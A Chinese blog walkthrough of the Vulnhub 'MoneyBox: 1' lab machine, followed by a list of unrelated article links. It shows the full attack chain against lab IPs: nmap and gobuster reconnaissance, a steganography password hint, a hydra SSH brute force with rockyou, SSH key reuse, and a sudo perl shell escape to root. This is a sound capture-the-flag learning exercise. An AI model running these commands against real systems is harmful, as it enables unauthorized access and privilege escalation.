当前位置: 首页 > news >正文

Vulnhub: MoneyBox: 1靶机

news 2025/8/12 6:46:39

kali:192.168.111.111

靶机:192.168.111.194

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.194

ftp匿名登录发现trytofind.jpg

目录爆破发现blogs目录

gobuster dir -u http://192.168.111.194 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

访问后查看源码提示另一个目录S3cr3t-T3xt

访问S3cr3t-T3xt目录查看源码

该密码为图片隐写的密码3xtr4ctd4t4

用提示的用户爆破ssh

hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.111.194 -s 22 ssh -t 64

提权

查看/home/lily/.ssh/authorized_keys,发现renu用户可以使用证书登录lily用户

登录后查看sudo权限

ssh lily@192.168.111.194

提权方法:perl | GTFOBins

提升为root

sudo -u root perl -e 'exec "/bin/sh";'

flag

http://www.lryc.cn/news/123980.html

相关文章:

  • [国产MCU]-BL602开发实例-LCD1602 I2C驱动
  • AI 绘画Stable Diffusion 研究(七) 一文读懂 Stable Diffusion 工作原理
  • URLSearchParams:JavaScript中的URL查询参数处理工具
  • 1.4 数据库管理与优化
  • T113-S3 Tina-Linux -- 2.开发板使用
  • Django-配置邮箱功能(一):使用django自带的发送邮件功能
  • JS实现树形结构、一维数组以及map之间的转换
  • Vue中自定义.js变量
  • 基于深度信念神经网络+长短期神经网络的降雨量预测,基于dbn-lstm的降雨量预测,dbn原理,lstm原理
  • SyntaxError: Cannot use import statement outside a module
  • 为什么要做数据可视化系统
  • Java项目作业~ 通过html+Servlet+MyBatis,完成站点信息的添加功能
  • 基于 Arduino 编写 ESP32 BLE Server 例程
  • Mac环境变量配置
  • 使用FTP文件传输协议的潜在风险
  • Jtti:windows虚拟内存最小值太低如何解决
  • 基于微服务+Java+Spring Cloud +Vue+UniApp +MySql实现的智慧工地云平台源码
  • Unity框架学习--4 Mono管理器
  • Unity zSpace 开发
  • SQL注入是什么?如何防范?
  • Spring kafka源码分析——消息是如何消费的
  • 汽车电子的发展对国产32位MCU的影响
  • Vue 目录结构 vite 项目
  • TB/TM-商品详情原数据(APP)
  • 小米发布会:雷军成长故事与创新壮举,AI大模型技术引领未来,雷军探索之路之从创业波折到小米AI领航,成就高端化传奇!
  • 春秋云镜 CVE-2021-41947
  • 面试题-React(一):React是什么?它的主要特点是什么?
  • 算法笔试 java 输入输出练习
  • 5.内置构造函数
  • DG故障切换及DG Broker失效配置清理